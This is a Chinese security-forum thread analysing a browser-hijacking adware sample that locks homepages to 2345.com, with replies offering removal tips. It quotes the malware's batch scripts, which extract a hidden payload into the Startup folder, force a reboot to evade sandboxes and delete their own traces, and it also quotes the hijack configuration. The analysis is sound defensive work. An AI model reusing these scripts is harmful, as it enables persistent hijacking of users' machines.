【小白求教】强锁主页加驱流氓行为分析
本帖最后由 翼风Fly 于 2015-10-13 18:51 编辑鄙人小白,OD代码不太懂,有些问题想请教一下论坛里各位大大~如果能行的话我挺想试试OD分析的。。。不会。。。
样本位于:http://bbs.kafan.cn/thread-1856719-1-1.html
为增强可读性,仅选取一部分,完整分析请见27楼:http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36051004
内容解析
接下来开始人工分析,菜菜一枚,各位轻拍~
下载后样本的直接分析
你要的东西.exe
OD里简单看了一下,这货就是个启动器,调用了几个系统文件,没看到什么特殊的地方(当然,看的比较草,水平也不够)
小白想问一下:
这东西用来干啥的?OD里发现调用了一下系统文件,但是不懂是怎么回事,求指点~
再看看里面批处理吧(我写了点注释)
::获取 当前用户的 运行 文件夹
for /f "skip=1 tokens=2*" %%a in ('reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup') do set qd=%%b
set qd=%qd:~0,-1%
::解压文件
mm.exe x -y -p mm.rar ^"%qd%\^"
::关机重启
Shutdown.exe -r -f -t 0
mm.exe其实就是WinRAR 5.21的命令版本,压缩包里一个是LMIns.exe(病毒主体),一个是2345.url (链接到 http://www.2345.com/?kisder)
RAR参数:
x 以完整路径提取文件
y 对所有询问假定选择“是”
p 设置密码
RAR将内容解压到启动文件夹中
密码是一个空格 ,而且竟然还TMD竟然是不常见的全角空格“ ”,对于不熟悉RAR命令行的人来说容易被迷惑;
真仔细。。。醉了。。。
竟然想到了关机啊这个比较绕的办法。。。。。不关机怎么过你的在线/沙箱?
这样的样本杀软能扫到就怪了,病毒被加密了,其他的都是白。
病毒主体:LMIns.exe
PEiD检测:Microsoft Visual Studio .NET 2005 -- 2008 -> Microsoft Corporation *
连壳都不加。原来这是个压缩包,释放5个文件。
(原文件已经由卡饭该帖的28楼提供下载)
先上在线行为:
【文件B超】https://b-chao.com/index.php/Ind ... 55106FDA7B8ADB85B2/
【哈勃】http://habo.qq.com/file/showdetail?pk=ADwGZ11tB2EIOA==
【火眼】我等的花都谢了。。。 报告还没生出来,先贴坑:http://fireeye.ijinshan.com/analyse.html?md5=e4ec639c04cb743ce6a343d27f199a8d
【VirusScan】昨天有人扫了,3个报毒;现在,还是仨;跟进厂商们的速度不给力?
http://www.virscan.org/scan/72208c7a2a96fb3fa168579d3b6077ef
【VirusTotal】还是这里的厂商更新给力(检出率 10 / 56 ):https://www.virustotal.com/en/file/20b01ba54c3ca10709e203eeac5449f65c307a327132786ef5c619cc3736c9d3/analysis/1444661993/
直接释放的文件如下:
batfile~.bat
这文件负责运行hlsys32.exe后删除痕迹。
"C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
:again
del "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /Q
if exist "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" goto again
del C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\*.*/Q
del %0
hlsys32.exe(需要UAC权限)(求指点)
LaoMa Software ——老马软件?挺形象,哈哈~这东西用来负责下面的文件运行。也就是说,如果这货起不来,下面的都作废。OD简单看了一下,各种系统调用。不过为啥颠来倒去就那几个文件。。。小白不懂。。。
hlsys64.exe
又是LaoMa Software,用来负责64位系统
lksys.ini
一生锁页。。。这个名字带感!undefined各种浏览器不惧,管他是不是XXX安全浏览器~
title=一生锁页
browsers_referer=chrome.exe*ucbrowser.exe*iexplore.exe*firefox.exe*360chrome.exe*360se.exe*liebao.exe*maxthon.exe*qqbrowser.exe*baidubrowser.exe*sogouexplorer.exe*opera.exe*f1browser.exe*2345Explorer.exe*2345chrome.exe*Opera\launcher.exe
url=http://www.2345.com/?kisder
param_deny=
param_reg_deny=
pmode=0
browsers=
saveurl=0
netcfgurl=
notclear=
pmode1=0
param_deny1=
param_reg_deny1=
lockmode=0
id=0
restart=0
secsnotlock=0
hlsys.dat
没仔细看,应该是个驱动
再往下我就不分析了。。。。
=============== 启示 ===============
[*]杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;
[*]如果这个毒一上来就用OD看,可能会很累,多次释放文件。沙箱竟然可以关机
所以还是虚拟机跑一边比较省事。。。。
最新发现,前方高能~~~
作者主页:http://hl.laolaoma.com/
{:301_983:}我都不知道该说什么好。。。
详情见:http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36057418 本帖最后由 qazwsxlty 于 2016-5-15 08:55 编辑
昨天一个朋友也碰见了这个,发过来让我分析,完全就是同一个东西。UAC弹出来的时候他选了是...
我提供给他的解决方法:删除启动文件夹下的2345.html和LMIns.exe。然后打开我提取出来的LMIns释放出来的四个文件中相应(32位点32,64位点64)的EXE,然后卸载。
然后他告诉我2345.html删不了,那就用工具删;然后我发的文件中exe打开之后不能点卸载(我怀疑是不是他64位开了32的),我当时让他点安装,然后点卸载(不卸载也行,我把配置文件里的锁定浏览器改成空了,不锁定任何浏览器)
最后传上我发给他的文件压缩包。文件超过1MB了,
本帖最后由 翼风Fly 于 2015-10-13 11:50 编辑
201411112020 发表于 2015-10-13 11:01
我擦,看不懂的纯大白路过。 只想知道万一中这个病毒了,怎么去除他,才能挽救自己的电脑。
杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;见我原帖后面的360双击测试:
http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36051004
我擦,看不懂的纯大白路过。 只想知道万一中这个病毒了,怎么去除他,才能挽救自己的电脑。 多谢,学习了。 好吧,我都看不懂{:301_971:} 火眼不能用了。等也等不出来了 送信员 发表于 2015-10-13 13:37
火眼不能用了。等也等不出来了
火眼团队主要做安卓行为分析了,PC端没人维护{:1_924:}
得等到他们把移动端完善后才会回来维护PC端分析 翼风Fly 发表于 2015-10-13 18:46
火眼团队主要做安卓行为分析了,PC端没人维护
得等到他们把移动端完善后才会回来维护PC端分析
我记得很长时间没法用了,现在哈勃后来者居上了 送信员 发表于 2015-10-14 11:40
我记得很长时间没法用了,现在哈勃后来者居上了
哈勃和B超都很不错,目前火眼确实没什么优势 o( ╯□╰ )o 涨姿势了
谢谢分享
页:
[1]
2